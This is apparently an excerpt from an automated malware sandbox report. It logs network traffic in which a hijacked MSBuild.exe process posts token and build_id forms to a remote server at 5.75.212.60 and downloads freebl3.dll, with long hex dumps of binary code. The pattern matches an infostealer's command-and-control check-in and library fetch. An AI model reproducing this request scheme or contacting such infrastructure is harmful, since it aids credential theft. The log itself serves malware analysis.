8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b Data Ascii: D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-07-26 16:56:16 UTC	16384	IN	Data Raw: 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-07-26 16:56:16 UTC	16384	IN	Data Raw: c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-07-26 16:56:16 UTC	16384	IN	Data Raw: c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-07-26 16:56:16 UTC	16384	IN	Data Raw: 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b Data Ascii: ,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-07-26 16:56:16 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49738	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:18 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEGHDAFIDGDAAKEBFHDA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:18 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 36 34 31 64 35 33 64 63 65 63 31 61 62 66 30 63 66 36 62 64 32 66 36 62 63 36 31 37 34 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 30 38 33 37 62 31 64 34 35 61 61 37 66 30 65 63 66 32 64 66 35 35 32 61 37 63 61 38 33 32 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 Data Ascii: ------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="token"5a641d53dcec1abf0cf6bd2f6bc6174d------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="build_id"b0837b1d45aa7f0ecf2df552a7ca832a------JEGHDAFIDGDAAKEBFHDACont
2024-07-26 16:56:19 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:56:19 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49739	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:19 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 1529 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:19 UTC	1529	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 36 34 31 64 35 33 64 63 65 63 31 61 62 66 30 63 66 36 62 64 32 66 36 62 63 36 31 37 34 64 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 30 38 33 37 62 31 64 34 35 61 61 37 66 30 65 63 66 32 64 66 35 35 32 61 37 63 61 38 33 32 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 Data Ascii: ------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="token"5a641d53dcec1abf0cf6bd2f6bc6174d------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="build_id"b0837b1d45aa7f0ecf2df552a7ca832a------GDAAKFIDGIEGDGDHIDAKCont
2024-07-26 16:56:19 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:56:19 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49740	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:20 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEGCBAAFHDHDHJKEGCFC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:20 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 47 43 42 41 41 46 48 44 48 44 48 4a 4b 45 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 36 34 31 64 35 33 64 63 65 63 31 61 62 66 30 63 66 36 62 64 32 66 36 62 63 36 31 37 34 64 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 41 41 46 48 44 48 44 48 4a 4b 45 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 30 38 33 37 62 31 64 34 35 61 61 37 66 30 65 63 66 32 64 66 35 35 32 61 37 63 61 38 33 32 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 41 41 46 48 44 48 44 48 4a 4b 45 47 43 46 43 0d 0a 43 6f 6e 74 Data Ascii: ------IEGCBAAFHDHDHJKEGCFCContent-Disposition: form-data; name="token"5a641d53dcec1abf0cf6bd2f6bc6174d------IEGCBAAFHDHDHJKEGCFCContent-Disposition: form-data; name="build_id"b0837b1d45aa7f0ecf2df552a7ca832a------IEGCBAAFHDHDHJKEGCFCCont
2024-07-26 16:56:21 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:56:21 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49742	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:21 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEGDBAFHJJDAKEBGCFCB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:21 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 47 44 42 41 46 48 4a 4a 44 41 4b 45 42 47 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 36 34 31 64 35 33 64 63 65 63 31 61 62 66 30 63 66 36 62 64 32 66 36 62 63 36 31 37 34 64 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 44 42 41 46 48 4a 4a 44 41 4b 45 42 47 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 30 38 33 37 62 31 64 34 35 61 61 37 66 30 65 63 66 32 64 66 35 35 32 61 37 63 61 38 33 32 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 44 42 41 46 48 4a 4a 44 41 4b 45 42 47 43 46 43 42 0d 0a 43 6f 6e 74 Data Ascii: ------AEGDBAFHJJDAKEBGCFCBContent-Disposition: form-data; name="token"5a641d53dcec1abf0cf6bd2f6bc6174d------AEGDBAFHJJDAKEBGCFCBContent-Disposition: form-data; name="build_id"b0837b1d45aa7f0ecf2df552a7ca832a------AEGDBAFHJJDAKEBGCFCBCont
2024-07-26 16:56:22 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:56:22 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49743	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:22 UTC	241	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:23 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:22 GMT Content-Type: application/octet-stream Content-Length: 685392 Connection: close Last-Modified: Friday, 26-Jul-2024 16:56:22 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-07-26 16:56:23 UTC	16124	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-07-26 16:56:23 UTC	16384	IN	Data Raw: ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 Data Ascii: E}1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x
2024-07-26 16:56:23 UTC	16384	IN	Data Raw: 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wP
2024-07-26 16:56:23 UTC	16384	IN	Data Raw: 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f Data Ascii: 00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
2024-07-26 16:56:23 UTC	16384	IN	Data Raw: e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
2024-07-26 16:56:23 UTC	16384	IN	Data Raw: c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 Data Ascii: EEPZ}EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w
2024-07-26 16:56:23 UTC	16384	IN	Data Raw: 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
2024-07-26 16:56:23 UTC	16384	IN	Data Raw: 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 Data Ascii: eUeLXee0@eeeue0UEeeUeee $
